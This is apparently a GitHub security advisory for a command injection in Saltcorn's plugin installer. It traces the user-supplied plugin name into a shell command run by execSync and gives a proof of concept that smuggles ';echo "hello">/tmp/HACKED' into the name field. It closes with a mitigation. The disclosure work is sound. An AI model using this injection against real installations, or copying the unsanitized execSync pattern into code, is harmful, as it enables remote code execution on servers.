GHSA-fm76-w8jw-xf8m

Summary

When creating a new plugin using the git source, the user-controlled value req.body.name is used to build the plugin directory where the location will be cloned. The API used to execute the git clone command with the user-controlled data is child_process.execSync. Since the user-controlled data is not validated, a user with admin permission can add escaping characters and execute arbitrary commands, leading to a command injection vulnerability.

Details

Relevant code from source (req.body) to sink (child_process.execSync).

• file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400

  router.post(
    "/",
    isAdmin,
    error_catcher(async (req, res) => {
      const plugin = new Plugin(req.body); // [1] 
        [...]
        try {
          await load_plugins.loadAndSaveNewPlugin( // [3] 
            plugin,
            schema === db.connectObj.default_schema || plugin.source === "github"
          );
          [...]
      }
    })
  );
  

• file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44

  class Plugin {
    [...]
    constructor(o: PluginCfg | PluginPack | Plugin) {
      [...]
      this.name = o.name; // [2] 
      [...]
  }
  

• file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65

  const loadAndSaveNewPlugin = async (plugin, force, noSignalOrDB) => {
    [...]
    const loader = new PluginInstaller(plugin); // [4] 
    const res = await loader.install(force); // [7] 
    [...]
  };
  

• file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61

  class PluginInstaller {
    constructor(plugin, opts = {}) {
      [...]
      const tokens =
        plugin.source === "npm"
          ? plugin.location.split("/")
          : plugin.name.split("/"); // [5] 
      [...]
      this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [6] 
      [...]
    }
  
  
    async install(force) {
      [...]
      if (await this.prepPluginsFolder(force, pckJSON)) { // [8] 
      [...]
    }
  
    async prepPluginsFolder(force, pckJSON) {
      [...]
      switch (this.plugin.source) {
        [...]
        case "git":
          if (force || !(await pathExists(this.pluginDir))) { 
            await gitPullOrClone(this.plugin, this.tempDir); // [9] 
        [...]
    }
  

• file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112

  const gitPullOrClone = async (plugin, pluginDir) => {
    [...]
    if (fs.existsSync(pluginDir)) {
      execSync(`git ${setKey} -C ${pluginDir} pull`);
    } else {
      execSync(`git ${setKey} clone ${plugin.location} ${pluginDir}`); // [10] 
    }
    [...]
  };
  

PoC

• check that the file will be created by the command echo "hello">/tmp/HACKED does not exists:

  cat /tmp/HACKED
  cat: /tmp/HACKED: No such file or directory
  

• login with an admin account
• visit http://localhost:3000/plugins/new
• enter the following fields:
  • Name: ;echo "hello">/tmp/HACKED
  • Source: git
  • other fields blank
• click Create
• you will get an error saying ENOENT: no such file or directory, .... but the command touch /tmp/HACKED will be executed
• to verify:

  cat /tmp/HACKED
  hello
  

Impact

Remote code execution

Recommended Mitigation

Sanitize the pluginDir value before passing to execSync. Alternatively, use child_process. execFileSync API (docs: https://nodejs.org/api/childprocess.html#childprocessexecfilesyncfile-args-options)